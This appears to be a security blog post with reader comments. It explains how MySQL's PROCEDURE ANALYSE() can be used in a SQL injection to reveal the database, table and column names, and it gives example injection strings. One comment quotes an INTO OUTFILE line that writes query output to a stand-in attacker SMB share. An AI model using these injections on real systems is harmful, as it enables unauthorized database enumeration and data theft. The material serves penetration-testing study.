While reading at sla.ckers.org about some ways to get a SQL injection working if your injection point is behind a “group by” and a “limit” clause, Pragmatk came up with the PROCEDURE ANALYSE operation (available on MySQL 3/4/5) I didnt knew of yet. Although it didnt quite solve the actual problem, because it seems that you cant build some dynamic parameters for the ANALYSE function so that you could build blind SQLi vectors, it does give you information about the used database, table and column names of the query you are injecting to.
So this is another way of finding table and column names on MySQL without using the information_schema tables or load_file(). Unfortunetly you will only get the names of the columns and tables in use, but at least it will make guessing easier or maybe some columns are selected but not displayed by the webapp so that you can union select them on a different position where they do get displayed.
Here is an example: Lets assume a basic SQL query you will encounter quite often:
SELECT id, name, pass FROM users WHERE id = x
while x is our injection point. Now you can use
x = 1 PROCEDURE ANALYSE()
to get all column names, including the database and table name currently selected. You will see something like this:
test.users.id
test.users.name
test.users.pass
Depending on the webapp you will need to use LIMIT to enumerate the result of PROCEDURE ANALYSE() line by line which contains the names in the first column of each row:
x = 1 PROCEDURE ANALYSE() #get first column name
x = 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
x = 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name
…
With that said it is neccessary that the webapp will display the first selected column, because PROCEDURE ANALYSE will reformat the whole result with its information about the columns which is normally used to identify the best datatype for this column.
Interesting operation, I wonder if there are any other I dont know of yet which can be useful in the right circumstances.
More:
update2
Reiners' Weblog 
SQL Injection in order by and group by:-
http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/
You can use UNION query to exploit injection in LIMIT, OFFSET query. I will post that sometime later.
hi sid, thanks for your link, unfortunetly this is not what we were looking for. we are trying to exploit a query with “group by” followed by a “limit”. both operations are simple to exploit on there own but not if they are combined.
i see, you could still use into outfile (file privileges).
However, i doubt if it can be of any much use either
check this, may be this can help, in this scenario, however, it will work with windows + FIle privs.
http://www.notsosecure.com/folder2/2009/02/13/my-sql-exfiltrating-data-over-out-of-band-channelsoob/
i’m not getting any result
in a query like: x = 1 LIMIT 1,1 PROCEDURE ANALYSE() but if i take the LIMIT, it works! any ideia?!
ah very nice, I just knew about the INTO OUTFILE ‘\\\\attacker\\SMBshare\\output.txt’ which is mostly useless.
Thanks for this article (and your others). They’ve taught me a great deal about web app vulnerabilities and SQL injection. (Thanks to Pragmatk for the idea, of course)
While I was playing around with this I couldn’t get it to work in combination with a UNION ALL SELECT. Do you think this is possible?
@Pieter. I had the same problem.
I suppose it will only work only you have exactly 10 columns in the first statement. (procedure analyse outputs 10 columns by default, and I couldn’t find a way to limit this)